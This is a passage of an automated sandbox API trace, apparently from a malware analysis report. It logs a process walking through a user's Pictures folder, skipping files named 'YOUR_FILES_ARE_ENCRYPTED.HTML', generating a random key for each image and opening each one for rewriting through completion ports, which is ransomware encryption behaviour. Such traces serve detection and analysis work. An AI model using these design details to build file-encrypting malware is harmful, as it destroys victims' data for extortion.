[0125.080] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="7A") returned 2 [0125.080] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="31") returned 2 [0125.080] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="B8") returned 2 [0125.080] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="7F") returned 2 [0125.081] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\FFm1TKgH mMhVT.png" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\FFm1TKgH mMhVT.png") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\FFm1TKgH mMhVT.png" [0125.081] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.081] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.085] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe62c0170, ftCreationTime.dwHighDateTime=0x1d6ffb7, ftLastAccessTime.dwLowDateTime=0xca81bfa0, ftLastAccessTime.dwHighDateTime=0x1d70930, ftLastWriteTime.dwLowDateTime=0xca81bfa0, ftLastWriteTime.dwHighDateTime=0x1d70930, nFileSizeHigh=0x0, nFileSizeLow=0xa0ed, dwReserved0=0x19ec60, dwReserved1=0x2125281, cFileName="GmXvqBEQUYyxri0sEv.jpg", cAlternateFileName="GMXVQB~1.JPG")) returned 1 [0125.085] StrStrIW (lpFirst="GmXvqBEQUYyxri0sEv.jpg", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.085] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\GmXvqBEQUYyxri0sEv.jpg") returned 77 [0125.085] PathFindExtensionW (pszPath="GmXvqBEQUYyxri0sEv.jpg") returned=".jpg" [0125.085] lstrlenW (lpString=".jpg") returned 4 [0125.085] PathFindExtensionW (pszPath="GmXvqBEQUYyxri0sEv.jpg") returned=".jpg" [0125.085] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0125.085] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\GmXvqBEQUYyxri0sEv.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\8jyygxllescuozkst_1\\gmxvqbequyyxri0sev.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.086] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=41197) returned 1 [0125.086] GetProcessHeap () returned 0x600000 [0125.086] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.086] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="96") returned 2 [0125.086] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="22") returned 2 [0125.086] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="47") returned 2 [0125.086] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="09") returned 2 [0125.086] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="B8") returned 2 [0125.086] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="F4") returned 2 [0125.086] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="61") returned 2 [0125.086] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="E3") returned 2 [0125.086] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="16") returned 2 [0125.087] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="B8") returned 2 [0125.087] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="DB") returned 2 [0125.087] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="A1") returned 2 [0125.087] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="92") returned 2 [0125.087] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="18") returned 2 [0125.087] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="23") returned 2 [0125.087] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="E7") returned 2 [0125.087] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="48") returned 2 [0125.087] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="F6") returned 2 [0125.087] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="08") returned 2 [0125.087] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="E1") returned 2 [0125.087] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="53") returned 2 [0125.087] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="0D") returned 2 [0125.087] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="66") returned 2 [0125.087] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="6C") returned 2 [0125.087] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="46") returned 2 [0125.087] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="6F") returned 2 [0125.087] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="01") returned 2 [0125.087] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="97") returned 2 [0125.087] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="F4") returned 2 [0125.088] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="20") returned 2 [0125.088] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="C4") returned 2 [0125.088] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="20") returned 2 [0125.088] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\GmXvqBEQUYyxri0sEv.jpg" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\GmXvqBEQUYyxri0sEv.jpg") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\GmXvqBEQUYyxri0sEv.jpg" [0125.088] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.088] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.091] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc6fe9610, ftCreationTime.dwHighDateTime=0x1d70961, ftLastAccessTime.dwLowDateTime=0x2d703fc0, ftLastAccessTime.dwHighDateTime=0x1d709e9, ftLastWriteTime.dwLowDateTime=0x2d703fc0, ftLastWriteTime.dwHighDateTime=0x1d709e9, nFileSizeHigh=0x0, nFileSizeLow=0x10149, dwReserved0=0x19ec60, dwReserved1=0x2125281, cFileName="Lq0XwoYW4UKz.bmp", cAlternateFileName="LQ0XWO~1.BMP")) returned 1 [0125.091] StrStrIW (lpFirst="Lq0XwoYW4UKz.bmp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.091] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\Lq0XwoYW4UKz.bmp") returned 71 [0125.091] PathFindExtensionW (pszPath="Lq0XwoYW4UKz.bmp") returned=".bmp" [0125.091] lstrlenW (lpString=".bmp") returned 4 [0125.091] PathFindExtensionW (pszPath="Lq0XwoYW4UKz.bmp") returned=".bmp" [0125.093] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0125.093] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\Lq0XwoYW4UKz.bmp" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\8jyygxllescuozkst_1\\lq0xwoyw4ukz.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.094] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=65865) returned 1 [0125.094] GetProcessHeap () returned 0x600000 [0125.094] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.094] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="3E") returned 2 [0125.094] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="E8") returned 2 [0125.094] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="32") returned 2 [0125.094] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="A2") returned 2 [0125.094] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="D1") returned 2 [0125.094] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="8D") returned 2 [0125.094] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="1C") returned 2 [0125.094] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="9B") returned 2 [0125.094] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="89") returned 2 [0125.094] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="9E") returned 2 [0125.094] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="BC") returned 2 [0125.094] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="4B") returned 2 [0125.095] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="64") returned 2 [0125.095] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="3B") returned 2 [0125.095] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="29") returned 2 [0125.095] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="AB") returned 2 [0125.095] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="30") returned 2 [0125.095] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="C6") returned 2 [0125.095] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="EE") returned 2 [0125.095] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="E0") returned 2 [0125.095] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="8F") returned 2 [0125.095] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="94") returned 2 [0125.095] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="E5") returned 2 [0125.095] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="F6") returned 2 [0125.095] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="01") returned 2 [0125.095] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="7A") returned 2 [0125.095] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="87") returned 2 [0125.095] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="EE") returned 2 [0125.095] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="43") returned 2 [0125.095] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="87") returned 2 [0125.095] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="84") returned 2 [0125.095] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="7D") returned 2 [0125.095] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\Lq0XwoYW4UKz.bmp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\Lq0XwoYW4UKz.bmp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\Lq0XwoYW4UKz.bmp" [0125.096] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.096] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.100] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x89bd90f0, ftCreationTime.dwHighDateTime=0x1d6ffaf, ftLastAccessTime.dwLowDateTime=0x80c128c0, ftLastAccessTime.dwHighDateTime=0x1d70628, ftLastWriteTime.dwLowDateTime=0x80c128c0, ftLastWriteTime.dwHighDateTime=0x1d70628, nFileSizeHigh=0x0, nFileSizeLow=0x5f7d, dwReserved0=0x19ec60, dwReserved1=0x2125281, cFileName="MvfmalECxbQ8.jpg", cAlternateFileName="MVFMAL~1.JPG")) returned 1 [0125.100] StrStrIW (lpFirst="MvfmalECxbQ8.jpg", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.100] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\MvfmalECxbQ8.jpg") returned 71 [0125.100] PathFindExtensionW (pszPath="MvfmalECxbQ8.jpg") returned=".jpg" [0125.100] lstrlenW (lpString=".jpg") returned 4 [0125.100] PathFindExtensionW (pszPath="MvfmalECxbQ8.jpg") returned=".jpg" [0125.100] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0125.100] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\MvfmalECxbQ8.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\8jyygxllescuozkst_1\\mvfmalecxbq8.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.100] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=24445) returned 1 [0125.100] GetProcessHeap () returned 0x600000 [0125.100] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.101] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="D7") returned 2 [0125.101] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="52") returned 2 [0125.101] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="76") returned 2 [0125.101] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="51") returned 2 [0125.101] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="5B") returned 2 [0125.101] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="F6") returned 2 [0125.101] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="C1") returned 2 [0125.101] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="BA") returned 2 [0125.101] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="5F") returned 2 [0125.101] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="21") returned 2 [0125.101] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="1E") returned 2 [0125.101] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="A9") returned 2 [0125.101] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="10") returned 2 [0125.101] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="E3") returned 2 [0125.102] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="C3") returned 2 [0125.102] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="55") returned 2 [0125.102] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="93") returned 2 [0125.102] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="18") returned 2 [0125.102] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="5D") returned 2 [0125.102] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="DF") returned 2 [0125.102] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="AC") returned 2 [0125.102] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="0E") returned 2 [0125.102] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="96") returned 2 [0125.102] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="6F") returned 2 [0125.102] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="9B") returned 2 [0125.102] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="D1") returned 2 [0125.102] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="5E") returned 2 [0125.102] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="D0") returned 2 [0125.102] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="55") returned 2 [0125.102] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="20") returned 2 [0125.102] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="57") returned 2 [0125.102] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="1A") returned 2 [0125.102] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\MvfmalECxbQ8.jpg" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\MvfmalECxbQ8.jpg") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\MvfmalECxbQ8.jpg" [0125.103] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.103] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.106] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf094dd50, ftCreationTime.dwHighDateTime=0x1d70433, ftLastAccessTime.dwLowDateTime=0x81367d10, ftLastAccessTime.dwHighDateTime=0x1d705aa, ftLastWriteTime.dwLowDateTime=0x81367d10, ftLastWriteTime.dwHighDateTime=0x1d705aa, nFileSizeHigh=0x0, nFileSizeLow=0x5bad, dwReserved0=0x19ec60, dwReserved1=0x2125281, cFileName="Tbqij8tCWXHYp1Fw5b7.png", cAlternateFileName="TBQIJ8~1.PNG")) returned 1 [0125.106] StrStrIW (lpFirst="Tbqij8tCWXHYp1Fw5b7.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.106] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\Tbqij8tCWXHYp1Fw5b7.png") returned 78 [0125.106] PathFindExtensionW (pszPath="Tbqij8tCWXHYp1Fw5b7.png") returned=".png" [0125.106] lstrlenW (lpString=".png") returned 4 [0125.106] PathFindExtensionW (pszPath="Tbqij8tCWXHYp1Fw5b7.png") returned=".png" [0125.106] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0125.106] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\Tbqij8tCWXHYp1Fw5b7.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\8jyygxllescuozkst_1\\tbqij8tcwxhyp1fw5b7.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.107] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=23469) returned 1 [0125.107] GetProcessHeap () returned 0x600000 [0125.107] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.107] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="8B") returned 2 [0125.107] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="2D") returned 2 [0125.107] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="6D") returned 2 [0125.107] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="68") returned 2 [0125.107] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="4D") returned 2 [0125.107] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="65") returned 2 [0125.107] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="BC") returned 2 [0125.107] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="5F") returned 2 [0125.107] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="73") returned 2 [0125.107] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="C3") returned 2 [0125.107] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="BA") returned 2 [0125.107] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: param_1="B6") returned 2 [0125.107] wsprintfW (in: param_1=0x19ea16, param_2="%02X" | out: param_1="94") returned 2 [0125.107] wsprintfW (in: param_1=0x19ea1a, param_2="%02X" | out: param_1="61") returned 2 [0125.107] wsprintfW (in: param_1=0x19ea1e, param_2="%02X" | out: param_1="BD") returned 2 [0125.107] wsprintfW (in: param_1=0x19ea22, param_2="%02X" | out: param_1="8E") returned 2 [0125.108] wsprintfW (in: param_1=0x19ea26, param_2="%02X" | out: param_1="8C") returned 2 [0125.108] wsprintfW (in: param_1=0x19ea2a, param_2="%02X" | out: param_1="3C") returned 2 [0125.108] wsprintfW (in: param_1=0x19ea2e, param_2="%02X" | out: param_1="5D") returned 2 [0125.108] wsprintfW (in: param_1=0x19ea32, param_2="%02X" | out: param_1="02") returned 2 [0125.108] wsprintfW (in: param_1=0x19ea36, param_2="%02X" | out: param_1="3D") returned 2 [0125.108] wsprintfW (in: param_1=0x19ea3a, param_2="%02X" | out: param_1="50") returned 2 [0125.108] wsprintfW (in: param_1=0x19ea3e, param_2="%02X" | out: param_1="FF") returned 2 [0125.108] wsprintfW (in: param_1=0x19ea42, param_2="%02X" | out: param_1="39") returned 2 [0125.108] wsprintfW (in: param_1=0x19ea46, param_2="%02X" | out: param_1="3D") returned 2 [0125.108] wsprintfW (in: param_1=0x19ea4a, param_2="%02X" | out: param_1="69") returned 2 [0125.108] wsprintfW (in: param_1=0x19ea4e, param_2="%02X" | out: param_1="62") returned 2 [0125.108] wsprintfW (in: param_1=0x19ea52, param_2="%02X" | out: param_1="AB") returned 2 [0125.108] wsprintfW (in: param_1=0x19ea56, param_2="%02X" | out: param_1="A6") returned 2 [0125.108] wsprintfW (in: param_1=0x19ea5a, param_2="%02X" | out: param_1="A2") returned 2 [0125.108] wsprintfW (in: param_1=0x19ea5e, param_2="%02X" | out: param_1="C7") returned 2 [0125.108] wsprintfW (in: param_1=0x19ea62, param_2="%02X" | out: param_1="0A") returned 2 [0125.108] lstrcpyW (in: lpString1=0x33500bc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\Tbqij8tCWXHYp1Fw5b7.png" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\Tbqij8tCWXHYp1Fw5b7.png") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\Tbqij8tCWXHYp1Fw5b7.png" [0125.108] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x3340008, NumberOfConcurrentThreads=0x0) returned 0x274 [0125.108] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x3340008, lpOverlapped=0x3340008) returned 1 [0125.112] FindNextFileW (in: hFindFile=0x6265f8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4a9e680, ftCreationTime.dwHighDateTime=0x1d704c7, ftLastAccessTime.dwLowDateTime=0x96593c30, ftLastAccessTime.dwHighDateTime=0x1d704f8, ftLastWriteTime.dwLowDateTime=0x96593c30, ftLastWriteTime.dwHighDateTime=0x1d704f8, nFileSizeHigh=0x0, nFileSizeLow=0x15985, dwReserved0=0x19ec60, dwReserved1=0x2125281, cFileName="ZttDQzAe7v0sT1.png", cAlternateFileName="ZTTDQZ~1.PNG")) returned 1 [0125.112] StrStrIW (lpFirst="ZttDQzAe7v0sT1.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0125.112] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\ZttDQzAe7v0sT1.png") returned 73 [0125.113] PathFindExtensionW (pszPath="ZttDQzAe7v0sT1.png") returned=".png" [0125.113] lstrlenW (lpString=".png") returned 4 [0125.113] PathFindExtensionW (pszPath="ZttDQzAe7v0sT1.png") returned=".png" [0125.113] SystemFunction036 (in: RandomBuffer=0x19eaa8, RandomBufferLength=0x20 | out: RandomBuffer=0x19eaa8) returned 1 [0125.113] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\Pictures\\8JYyGxLLeSCuOZKSt_1\\ZttDQzAe7v0sT1.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\8jyygxllescuozkst_1\\zttdqzae7v0st1.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0125.113] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19eacc | out: lpFileSize=0x19eacc*=88453) returned 1 [0125.113] GetProcessHeap () returned 0x600000 [0125.113] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x3340008 [0125.116] wsprintfW (in: param_1=0x19e9e6, param_2="%02X" | out: param_1="9E") returned 2 [0125.116] wsprintfW (in: param_1=0x19e9ea, param_2="%02X" | out: param_1="3E") returned 2 [0125.116] wsprintfW (in: param_1=0x19e9ee, param_2="%02X" | out: param_1="F7") returned 2 [0125.116] wsprintfW (in: param_1=0x19e9f2, param_2="%02X" | out: param_1="58") returned 2 [0125.116] wsprintfW (in: param_1=0x19e9f6, param_2="%02X" | out: param_1="8F") returned 2 [0125.116] wsprintfW (in: param_1=0x19e9fa, param_2="%02X" | out: param_1="37") returned 2 [0125.116] wsprintfW (in: param_1=0x19e9fe, param_2="%02X" | out: param_1="FF") returned 2 [0125.116] wsprintfW (in: param_1=0x19ea02, param_2="%02X" | out: param_1="15") returned 2 [0125.116] wsprintfW (in: param_1=0x19ea06, param_2="%02X" | out: param_1="78") returned 2 [0125.116] wsprintfW (in: param_1=0x19ea0a, param_2="%02X" | out: param_1="DE") returned 2 [0125.116] wsprintfW (in: param_1=0x19ea0e, param_2="%02X" | out: param_1="39") returned 2 [0125.116] wsprintfW (in: param_1=0x19ea12, param_2="%02X" | out: 